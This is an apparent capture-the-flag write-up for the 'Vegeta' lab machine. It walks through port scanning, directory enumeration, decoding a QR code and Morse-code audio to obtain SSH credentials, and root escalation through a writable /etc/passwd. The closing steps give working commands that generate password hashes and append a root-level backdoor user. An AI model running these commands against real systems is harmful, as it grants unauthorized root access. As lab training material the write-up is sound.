Vegeta is one of the characters in Dragon Ball Series
Interesting box and let's do this!
Let’s do nmap first and see what do we get.
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38
First thing first let's enumerate more if we can see any files or directories.
Lets open robots.txt first. Did we found a directory?
We got a html file but its nothing except Vegeta-1.0?
As we open the source code we found a base64 encoded at the end of the page! After decoding it two times with base64 we get a QR Code.
Let's see what do we get here.
zbarimg <image file>
We got a possible password but actually it is a rabbit hole haha. So after I got some hints to enumerate more that's when I thought maybe we should use a custom wordlist of Dragonball characters? Lets Gobuster again with our new custom wordlist (You can get in the references below)
As we go inside the directory we found an audio file.
As we open the audio we can confirm that it is a MORSE CODE audio!
First User (trunks)
Let's decode the audio file using and online morse code decoder.
We got a credential and we got our first user!
As we got a user now lets use linpeas for more information.
Okay that what we want to see! A writeable /etc/passwd !! There are a few ways for this but I choose these 3 using Perl, Python and OpenSSL.
We can read .bash_history in the trunks directory.
Just follow these 4 steps and we will get to the root!
perl -le 'print crypt("Password@973","addedsalt")'#Second
echo 'Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd#Third
Password : Password@973
python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'#Second
echo 'Tom:$6$salt$3aEJgflnzWuw1O3tr0IYSmhUY0cZ7iBQeBP392T7RXjLP3TKKu3ddIapQaCpbD4p9ioeGaVIjOHaym7HvCuUm0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd#Third
Password : pass
openssl passwd -1 -salt Tom pass123#Second
echo 'Tom:$1$Tom$3BObOqrD3qG2Zs.sgxkf4.:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd#Third
Password : pass123
If there is any suggestion please tell me or if there is something that I can improve also please do tell me. Hope this writeup help anyone and let’s learn together :)
Love to explore and always curious a lot of things.Support my writing and I would love to write more contents :) You…